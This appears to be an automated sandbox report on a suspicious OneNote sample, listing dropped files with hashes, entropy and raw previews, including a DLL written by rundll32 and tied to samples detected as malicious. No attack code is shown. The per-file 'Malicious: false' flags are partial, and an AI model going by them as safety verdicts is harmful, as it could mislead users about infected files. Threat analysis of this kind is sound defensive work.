Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".m.6.j.q.U.S.8.7.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.M.+.3.X.V.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\de-ch[1].htm

Download File

Process:	C:\Windows\SysWOW64\backgroundTaskHost.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3929), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	141828
Entropy (8bit):	5.00845324487067
Encrypted:	false
SSDEEP:	1536:dmIkGwMO4q6OlD0bfcSYQ1LQJ79L/yQXa/bC9:dXwMO4q6OlDIu9
MD5:	34358AEA05F2076AAA316CEFFE76935D
SHA1:	98D61D9282D86E9CDB3D0D1D9DD307DA07C67638
SHA-256:	02419E3073AAA006398606A0EEC833713CBFC4A9F39768B9913A908E941F954B
SHA-512:	8E6D759C605FF6559C82BD9C6948814030DB340B88BE016CAE7B1210B6AEB8854D68ACD846CCDF4F7F65416E4A4059F2C4B6C28DCF6A104E4D72AFA8622760F6
Malicious:	false
Preview:	<!DOCTYPE HTML>..<html lang="de-CH" dir="ltr">.<head>. . .... . .. . . <meta charset="UTF-8"/>. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>. <meta http-equiv="x-ua-compatible" content="ie=edge"/>.. <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/>.. ... . <meta name="robots" content="index, follow"/>. . .. <meta name="template" content="mscom"/>.. . <meta name="awa-canvasType" content="web"/>. <meta name="awa-isTented" content="false"/>.. <meta name="awa-pageType" content="MSCOM Home Page"/>. <meta name="awa-pgtmp" content="mscom"/>. <meta name="awa-pageId" content="4bca0c3fec9ac6f60e06b6d38431f70a"/>. <meta name="awa-market" content="de-ch"/>. <meta name="awa-cms" content="AEM"/>. <meta name="awa-enabledFeatures" content="contentbackfillgenerate;experimentation;esiproductcards;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsq

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675800120151438600_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (9332), with CRLF line terminators
Category:	dropped
Size (bytes):	16777216
Entropy (8bit):	0.05915492508165404
Encrypted:	false
SSDEEP:	1536:Lf+KA/ujeX+QnTGpTGL7SAUy0BidWT2noMBWhjsoWISEhCIb7auG6KU9IbHzqCeN:gPgTtI
MD5:	42FEFC844BB962E0C2308684F9849A3F
SHA1:	30467E247598C321B01BDBC115BAADB34F2077E4
SHA-256:	C4F417A7AE7F3EF3DB9FC9A7C2F58649D90D9172A952B296FF8FE655DA7EB237
SHA-512:	E455538124DED80D6AE2568115E66289F9218F32574B8643BC764619E16933F892E181C5F887FB108A0F59F20637212432C45F8008BAA0615EB96BC669F9199F
Malicious:	false
Preview:	Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..02/07/2023 20:02:00.295.ONENOTE (0x1914).0x1904.Microsoft OneNote.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.OneNote.System.AppLifeCycle.AppLaunch","Flags":2814758373932801,"InternalSequenceNumber":37,"Time":"2023-02-07T20:02:00.295Z"}...02/07/2023 20:02:00.435.ONENOTE (0x1914).0x1904.Microsoft OneNote.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.OneNote.NotebookManagement.CreateNotebook","Flags":2814775570513665,"InternalSequenceNumber":42,"Time":"2023-02-07T20:02:00.435Z","Contract":"Office.System.Activity","Activity.CV":"jJPkEWElz06a4fajTvQadg.1.12","Activity.Duration":19073,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.Activity.ActivityType":true,"Data.Activity.Namespace":"Office.OneNote.NotebookManagement","Data.SH_ErrorCode":0,"Data.Activity.Reason":"","Data.Activity.SucceedCount":1}...02/07/2023 20:02:00.435.ONENOTE (0x1914).0x1904.Microsoft OneNote.Tele

C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675800120152158700_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	16777216
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	2C7AB85A893283E98C931E9511ADD182
SHA1:	3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
SHA-256:	080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
SHA-512:	7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0p22qofu.bhw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ownlyw2.p2v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5br2alh.dlr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uegvsqlt.h1j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\e77242d6.dll

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1696752
Entropy (8bit):	6.289245533856013
Encrypted:	false
SSDEEP:	24576:ii1trs9xgh4uC6t6B8R9Hb6fvTCK4KtwZ7E3r5am7/Wjh5a6PaDKpN:iVxgOuiB8RBb6WGwO8zSDo
MD5:	83D0087A8DC3B0EE76F68FB273FFF863
SHA1:	019AC92ECD80B9FA6CA9E3F6D09E649CE325ECB5
SHA-256:	4883769CFC1F8633A37A179D3B4AB41CF30B75190ECCF34056F1489648C310C6
SHA-512:	7A1D1D0EB8B7C55570EAC75445152899B3C371A430F4B31EE2F88430AC3425BF34221AF9E09DAA1E30CBEE508A749E9B1534904EE187C19272330ACEE915337C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: Note.one, Detection: malicious, Browse Filename: Document.one, Detection: malicious, Browse Filename: notes.one, Detection: malicious, Browse Filename: qopceyu.dll, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 06mNIWJoVz.exe, Detection: malicious, Browse Filename: 5W8kRNoAdB.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: RS9009.img, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Grant#2929.html, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: RFSL#6617.img, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: dBDfcVVkIk.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.=FizS.izS.izS.2.P.jzS.}.S.hzS.}.P./zS.}.].q{S.}.V.rzS.}.W..zS.}...hzS.}.Q.hzS.RichizS.........................PE..L....2............!.........................0....(K.........................0.......\|....@A........................ ...U................................[.......Q...r..p........................... ................................................text...u........................... ..`PAGE............................... ..`RT........... ...................... ..`.data...TZ...0......................@....mrdata.x#.......$..................@....00cfg...............6..............@..@.rsrc................8..............@..@.reloc...Q.......R...6..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{00674DC2-B41D-4B0B-9989-A20E4FDD944C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Temp\{09CE97BB-0A80-4E71-8376-15B3505CC131}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{0DF51EC1-3AA7-4E7B-9C2F-D22BD13F6190}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Temp\{101FBD66-C705-4458-A7DC-E6E51AC79468}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Temp\{11465873-84C8-4860-969F-229AFD5F82F3}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{17C9BDF7-E8BD-44BF-986D-79C48F038B73}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{194EF100-73A4-4EEB-A6A0-4DECD8007540}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6461440065065247
Encrypted:	false
SSDEEP:	6:RaSNaTYyfB3h1RRXUnfTZh//liyPFFBl/FKoPgOPkrRujlw//0lweI/8PkxRujd:RahYyf9/UfTZJ/XPFFBtLYOcUWf/8c8
MD5:	DF2DCA1B888B4F75175A85D7DEF8F49E
SHA1:	7DA9E528DAB82A6AE22E17A05996EC16068AC432
SHA-256:	41E4CF17BB0AD2F1E3760A6D2062DE294B71B66DF9EF18D698AB27C764AF2337
SHA-512:	8596677541B8778621022BD7E5D3C63F9C0BE844966E3911233205AB8DEDB7B0F18C5482F49BDE2BB2F3307130B4E0BA6E23674EAC4679A154BA312DF35148A0
Malicious:	false
Preview:	./.C..vL....W"v_.."t.E..(u~#.P................?.....I...............................................................................................................h............................................3'U..*O..T..............=.....L.G.....t............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{1A8EE2E6-020D-4445-98FA-9B3268050AAA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6477867539568787
Encrypted:	false
SSDEEP:	6:Rakxm0FYyfB3h1RRXUnfOZbg/O+uFFBl/FK/6ElOt86ElJRujlw//0lweI/eT86x:RakxmkYyf9/UfOZbg5uFFBt9Wf/ej
MD5:	680081AEE2BB7CD41D173B0D00A8FB88
SHA1:	CA77A0201270E73F77E139E12F9DD99D3C858E17
SHA-256:	0FDA0C8346329644561462039415621844454DE956FFF77593C8317CA250E31A
SHA-512:	32EFBC5B063440DAA9656998573195A2025B7B953D234D9D0B51E7879BBAB2FB49E502A9D6A634A6553948D1D771781923E2ECBCF7831C01DAF0A9C63283D4C7
Malicious:	false
Preview:	./.C..vL....W"v_..s./.I.,.Xy..c................?.....I...............................................................................................................h..............................................vP.E@..fS. ..........4.~/..L...................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{1B30A61F-44D3-402F-B98E-D39EAA8FB439}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6440091184983782
Encrypted:	false
SSDEEP:	6:Ra4N6xYyfB3h1RRXUnfI4AZmXFFBl/FKGaHYp4OGHYp4RRujlw//0lweI/KYHYpl:Ra4aYyf9/Uf+SFFBtlP3Wf/KJ7
MD5:	05F2AB7E1E4DC8555ED9D63645EAA287
SHA1:	F856625F643B0BABD7684F05CE447417A8764242
SHA-256:	B3C672F328B3846016656CC453B418AC178D82D3B36DEC5DEB6D43BBA8D1A346
SHA-512:	624E8C6483447D9D6123F7D0D42A3E70093E5A5DE83390D008A0BDDDF2ADF8FF660BE430CBF3B72CD7DF84561348F10326898766EF4472EAF7954365D339B9D0
Malicious:	false
Preview:	./.C..vL....W"v_...u..II.t...=8]................?.....I...............................................................................................................h............................................`]....D.....D..........f..J...N..&.u.. ............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{1C96B25D-0FE3-408E-89C0-52E690B483B7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
